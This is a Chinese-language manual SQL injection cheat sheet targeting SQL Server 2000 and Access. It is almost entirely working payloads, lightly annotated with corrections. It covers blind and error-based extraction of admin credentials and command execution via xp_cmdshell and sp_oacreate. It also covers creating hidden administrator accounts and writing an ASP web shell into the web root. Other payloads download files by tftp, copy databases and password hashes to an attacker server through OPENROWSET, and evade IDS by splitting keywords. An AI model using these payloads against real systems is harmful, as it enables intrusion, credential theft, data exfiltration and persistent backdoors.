1. 判断有无注入点
' and 1=1
' and 1=2
两个页面返回不同即存在注入；数字型参数去掉前面的单引号。说明：原帖里的单引号被论坛过滤掉了，下文已按语法补回；本文针对的是 SQL Server 2000 / Access 时代的手工注入，2005 及以后 xp_cmdshell、Ole Automation Procedures、Ad Hoc Distributed Queries 默认都是关闭的，相关语句需要 sysadmin 先用 sp_configure 打开。
2. 猜表：一般的表名无非是 admin、adminuser、user、pass、password 等。
and 0<>(select count(*) from *)          -- 原帖如此，这句本身语法无效；要确认子查询能执行可改用 and 0<>(select count(*) from sysobjects)
and 0<>(select count(*) from admin)      -- 判断是否存在 admin 这张表，不存在则报错或返回错误页
3. 猜帐号数目：如果 0< 返回正确页面、1< 返回错误页面，说明帐号数目就是 1 个。
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还有：and (select count(列名) from 表名)>0   -- 列不存在则报错
4. 猜解字段名称：在 len() 括号里填上猜测的字段名，字段不存在则报错。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(name)>0)--        -- 用户名字段，例如 name
and 1=(select count(*) from admin where len(password)>0)--    -- 密码字段，例如 password
注意：and 1=(select count(*) ...) 只在表里恰好一条记录时为真（第 3 步已猜出记录数）；多条记录时改用 and 0<(select count(*) ...)。
5. 猜解各个字段的长度：把 >0 逐步变换，直到返回正确页面为止。
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)        -- 错误
and 1=(select count(*) from admin where len(name)>5)        -- 正确，长度是 6
and 1=(select count(*) from admin where len(name)=6)        -- 正确
and 1=(select count(*) from admin where len(password)>11)   -- 正确
and 1=(select count(*) from admin where len(password)>12)   -- 错误，长度是 12
and 1=(select count(*) from admin where len(password)=12)   -- 正确
猜长度还有：and (select top 1 len(username) from admin)>5
6. 猜解字符
and 1=(select count(*) from admin where left(name,1)='a')    -- 猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)='ab')   -- 猜解用户帐号的前两位
就这样一次加一个字符地猜，猜到刚才得到的长度为止，帐号就出来了。
猜内容还有：and (select top 1 asc(mid(password,1,1)) from admin)>50   -- 用 ASCII 码二分；asc()/mid() 是 Access(Jet) 的函数，SQL Server 下用 ascii()/substring()
and 1=(select top 1 count(*) from Admin where asc(mid(pass,5,1))=51)--
这个查询语句可以猜解中文的用户名和密码：只要把后面的数字换成对应字符的编码即可，最后再把结果转换回字符。
' group by users.id having 1=1--
' group by users.id, users.username, users.password, users.privs having 1=1--
（利用 group by/having 的报错逐列爆出列名：每次把错误信息里提到的那一列加进 group by，直到不再报错。）
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
' UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
' UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
' UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
' UNION SELECT TOP 1 login_name FROM logintable--
' UNION SELECT TOP 1 password FROM logintable WHERE login_name='Rahul'--
（原帖第二、三句写成了两个 WHERE，应为 AND；"列名"对应 INFORMATION_SCHEMA.COLUMNS 里的 COLUMN_NAME 列。）
看服务器版本和补丁：把 @@VERSION 和整数比较，转换报错时错误信息里带出版本号（例如 SP4）。
and 1=(select @@VERSION)--
看数据库连接帐号的权限：返回正常，证明连接帐号在服务器角色 sysadmin 中。
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
判断连接数据库的帐号（返回正常 = 连接帐号是 sa）：
and 'sa'=(SELECT system_user)--
and user_name()='dbo'--
and 0<>(select user_name())--        -- 原帖少了一个右括号；通过转换报错直接带出当前用户名
看 xp_cmdshell 是否被删除：
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell')--
xp_cmdshell 被删除后可以恢复（需要 sysadmin），支持绝对路径：
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
注意：以上是 SQL Server 2000 的情况。2005 及以后 xp_cmdshell 默认是关闭而不是删除，需要 sysadmin 执行 sp_configure 'show advanced options',1; reconfigure; sp_configure 'xp_cmdshell',1; reconfigure 才能使用。
反向 ping 自己（验证能否执行系统命令，用自己机器上的抓包/ICMP 回显确认）：
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--
注意：sp_oacreate/sp_oamethod 需要 sysadmin；2005 及以后还需先用 sp_configure 打开 'Ole Automation Procedures'。命令以 SQL Server 服务帐号的身份运行。
加帐号：
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
创建一个指向 E 盘的虚拟目录：
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'--
设置虚拟目录的访问属性（配合写入一个 webshell）：
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
MSSQL 也可以用联合查询（union 的列数必须和原查询一致，先逐个加列试出列数）：
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin    （union 在 Access 下也好用）
爆库的特殊技巧（IIS + Access）：把 URL 里 asp 文件前的 / 换成 %5c（也就是 \）提交，Jet 引擎在解析相对路径时报错，错误信息里带出数据库文件的物理路径。（原帖此处文字已残缺，按通常做法补全。）
得到 WEB 路径
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--       -- char 与 int 比较报错，错误信息里带出内容
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(500) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
（原帖把结果 insert 到了并不存在的 paths(path)，应为上面建的 newtable(paths)；xp_regread 的输出参数名是 @value；原帖 @test 只给了 varchar(20)，路径稍长就会被截断，改成 varchar(500)。IIS 的站点根目录记录在注册表 Virtual Roots 下，@value_name='/' 即默认站点根。）
;use ku1;--
;create table cmd (str image);--    -- 建立 image 类型的表 cmd
存在 xp_cmdshell 时的测试过程：
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin 'jiaoniang$';--                        -- 加 SQL 帐号
;exec master.dbo.sp_password null,'1866574','jiaoniang$';--        -- 原帖把后两个参数写反了：sp_password 的顺序是 旧密码,新密码,登录名
;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start','schedule'      -- 启动服务
exec master..xp_servicecontrol 'start','server'
; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
; exec master..xp_cmdshell 'tftp -i youip get file.exe'--           -- 利用 TFTP 上传文件（youip 换成自己的 IP）
注意：xp_cmdshell 和 sp_oamethod 启动的命令都以 SQL Server 服务帐号的身份运行，服务帐号不是本地管理员时 net user / net localgroup 会失败。
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a sysname;set @a=db_name();backup database @a to disk='\\你的IP\你的共享目录\bak.dat'    -- 备份到自己的 UNC 共享，原帖反斜杠被吃掉了；SQL Server 服务帐号要能写该共享
如果当前连接帐号权限被限制（不是 sa）而 sa 口令为空或已知，可以用 openrowset 以 sa 身份回连本机执行：
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'';exec master.dbo.sp_addlogin ''hax''')
（这是 OPENROWSET 的三段式 'server';'user';'password' 写法，原帖引号被过滤后成了 server;sa;。）
查询构造：
SELECT * FROM news WHERE id=... AND topic=... AND .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,1),1)='1') and userpass <> ''
（在用户名字段注入，逐位比较 victim 的口令；原帖这一行过滤得比较严重，以上是补回引号后的形式。）
select 123;--
;use master;--
a' or name like 'fff%';--    -- 显示有一个叫 ffff 的用户
and 1<>(select count(email) from [user]);--        -- 确认表里有 email 字段（原帖 user/users 混用，以实际表名为准）
;update [users] set email=(select top 1 name from sysobjects where xtype='U' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='U' and name='ad') where name='ffff';--
;update [users] set email=(select top 1 name from sysobjects where xtype='U' and id>581577110) where name='ffff';--
;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
上面的第一条语句得到数据库中的第一个用户表，并把表名放进 ffff 用户的邮箱字段中。
通过查看 ffff 的用户资料可得第一个用户表叫 ad。
然后根据表名 ad 得到这个表的 ID，再取 id 大于它的下一个表，就得到第二个表的名字。
注意：这种方法会覆盖真实用户的 email 字段，是破坏性写操作；授权测试中应先记下原值，或改用自己插入的测试帐号来承载数据。
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--    -- 用 char() 拼出 'chris'，绕过对单引号的过滤
insert into users values( 667,'123','123',0xffff)--
insert into users values ( 123, 'admin--', 'password', 0xffff)--
;and user>0                                  -- user 返回字符串，与 int 比较报错，错误信息里带出当前用户名
;and (select count(*) from sysobjects)>0     -- 返回正常说明是 SQL Server
;and (select count(*) from msysobjects)>0    -- Access 的系统表叫 MSysObjects（原帖拼成了 mysysobjects）；默认对它没有读权限，通常是报"没有读取数据权限"而不是返回正常，报错本身就说明是 Access
枚举数据表名：
;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0);--
这是将第一个表名更新到 aaa 的字段处。
读出第一个表后，第二个表可以这样读（在条件后加上 and name<>'刚才得到的表名'）：
;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0 and name<>'vote');--
然后 id=1552 and exists(select * from aaa where aaa>5)     -- aaa 是字符型，与 5 比较时转换报错，错误信息里带出表名
读出第二个表，一个个地读，直到没有为止。
读字段是这样：
;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错，得到第 1 个字段名
;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错，得到第 2 个字段名
[获得数据表名]（将某个字段的值更新为表名，再设法读出这个字段的值就可得到表名）
update 表名 set 字段=(select top 1 name from sysobjects where xtype='U' and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件]
或者：select top 1 name from sysobjects where xtype='U' and status>0 and name not in('table1','table2',…)
通过 SQL Server 注入漏洞建数据库管理员帐号和系统管理员帐号的前提：当前连接帐号必须在 sysadmin 角色中。
[获得数据表字段名]（将字段值更新为字段名，再设法读出这个字段的值就可得到字段名）
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段序号,如 1)) [ where 条件]
绕过 IDS 检测（用变量拼接存储过程名，避免关键字 xp_cmdshell 直接出现在请求里）：
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
1、 开启远程数据库（OPENROWSET 即席查询）
基本语法：
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')
参数：(1) OLE DB Provider 名称 (2) 连接字符串 (3) 要在远端执行的查询
2、 连接字符串中可以指定任意端口，比如：
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table')
3、 复制目标主机的整个数据库：把远程表全部 insert 到本地表。
注意：2005 及以后 OPENROWSET 的即席查询默认关闭，需要 sp_configure 'Ad Hoc Distributed Queries',1；另外这种用法会把自己机器的 sa 口令明文放进注入语句，目标的 web 日志和 SQL 跟踪里都看得到。
基本语法：
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2
这行语句将目标主机上 table2 表中的所有数据复制到远程数据库（攻击者自己的库）中的 table1 表中。实际运用中修改连接字符串的 IP 地址和端口，指向自己的机器，比如：
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns
（_sysdatabases、_sysobjects、_syscolumns 是在自己库里预先建好的、列结构与对应系统表一致的表；列数或类型对不上 insert 就会失败。）
复制数据库：
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database..table1
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database..table2
复制登录口令的哈希：SQL Server 2000 的登录密码 hash 存在 master.dbo.sysxlogins 里（原帖写的 database.dbo.sysxlogins 不对，这张表只在 master 中；2005 及以后换成 sys.sql_logins 的 password_hash 列，要有 CONTROL SERVER 权限才读得到）。方法如下：
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from master.dbo.sysxlogins
得到 hash 之后，就可以离线暴力破解。
遍历目录的方法：先创建一个临时表 temp：
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;--                 -- 获得当前所有驱动器（结果集 4 列，正好对应 temp 的 4 列）
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--         -- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--    -- 获得所有子目录的目录树结构，并存入 temp 表
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--    -- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--    -- xp_dirtree 在 SQL Server 2000 上 public 角色即可执行
insert ... exec 要求目标列数与存储过程结果集的列数一致，所以要按结果集指定列。以上就是把存储过程的输出写入表的方法。
检查当前连接帐号属于哪些固定服务器角色（返回正常即属于该角色）：
语句1：and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
语句2：and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
语句3：and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
语句4：and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句5：and 1=(SELECT IS_SRVROLEMEMBER('processadmin'));--    -- 原帖此处重复了 securityadmin，按固定服务器角色列表补为 processadmin
语句6：and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
语句7：and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句8：and 1=(SELECT IS_SRVROLEMEMBER('dbcreator'));--       -- 原帖此处重复了 bulkadmin，补为 dbcreator
语句9：and 1=(SELECT IS_MEMBER('db_owner'));--               -- 这个是当前库的数据库角色，不是服务器角色
把路径写到表中去：
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--                                  -- 转换报错带出第一个目录名
and 0<>(select top 1 paths from dirs where paths not in('Inetpub'))--    -- 排除已得到的目录，再带出下一个
;create table dirs1(paths varchar(100), id int)--
;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--                      -- 原帖误写成 insert dirs，应写入刚建的 dirs1
and 0<>(select top 1 paths from dirs1)--
把数据库备份到网页目录再下载：
;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--
注意：备份文件由 SQL Server 服务帐号写入，它要对网页目录有写权限；备份文件放在 web 目录下任何人都能下载，测完务必删除。
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)    -- char(85)='U'，取第 12 个用户表的名字（转换报错带出）
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)    -- 查看相关表的第 1 个字段名
and 1=(select user_id from USER_LOGIN)
and 0=(select [user] from USER_LOGIN where [user]>1)    -- user 是保留字，作列名要加方括号
-=- wscript.shell example -=-
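-- wscript.shell via OLE Automation: launch notepad.exe on the database server.
-- The process runs as the SQL Server service account.  Needs sysadmin, and on
-- SQL Server 2005+ the 'Ole Automation Procedures' option must be enabled.
-- (Original listing had its string quotes stripped; restored here.)
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'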
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--    -- 上面例子的单行注入形式
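-- Read c:\boot.ini line by line through Scripting.FileSystemObject and PRINT
-- each line.  PRINT output only comes back in the client's message stream, so
-- this is useful where that stream is visible (not through a blind web form).
-- Needs sysadmin; on SQL Server 2005+ 'Ole Automation Procedures' must be on.
-- (Original listing had its string quotes stripped and an unused @t; fixed.)
declare @o int, @f int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1   -- 1 = ForReading
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )   -- sp_oamethod returns 0 on success; non-zero at EOF or error
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end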
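-- Write a one-line ASP command shell into the IIS web root through
-- Scripting.FileSystemObject.  The resulting foo.asp runs whatever is passed in
-- ?cmd= under the IIS worker identity -- remove it as soon as the test is over.
-- Needs sysadmin (and 'Ole Automation Procedures' on 2005+); the SQL Server
-- service account must be able to write to c:\inetpub\wwwroot.
-- (Original listing had its string quotes stripped and an unused @t; fixed.)
declare @o int, @f int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1   -- 1 = overwrite if present
exec @ret = sp_oamethod @f, 'writeline', NULL,
    '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'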
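-- Joke payload (it appears to come from the early "Advanced SQL Injection"
-- write-ups): make the server talk through the SAPI speech.voicetext COM object,
-- then wait 5 s so the batch does not finish before the speech does.  The point
-- is that sp_oacreate can instantiate any registered COM class, not only
-- wscript.shell.  (Original listing had its string quotes stripped; restored.)
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
waitfor delay '00:00:05'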
; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--    -- 上面例子的单行注入形式
xp_dirtree 在 SQL Server 2000 上 public 角色即可执行。
exec master.dbo.xp_dirtree 'c:\' 返回的结果集有两个字段 subdirectory、depth：subdirectory 是字符型，depth 是整型。
create table dirs(paths varchar(100), id int)
建表：这里建的表要和 xp_dirtree 的结果集对应，字段数相等、类型兼容。
insert dirs exec master.dbo.xp_dirtree 'c:\'
只要我们建的表与存储过程返回的结果集定义一致就能执行，达到写表的效果，一步步取得想要的信息。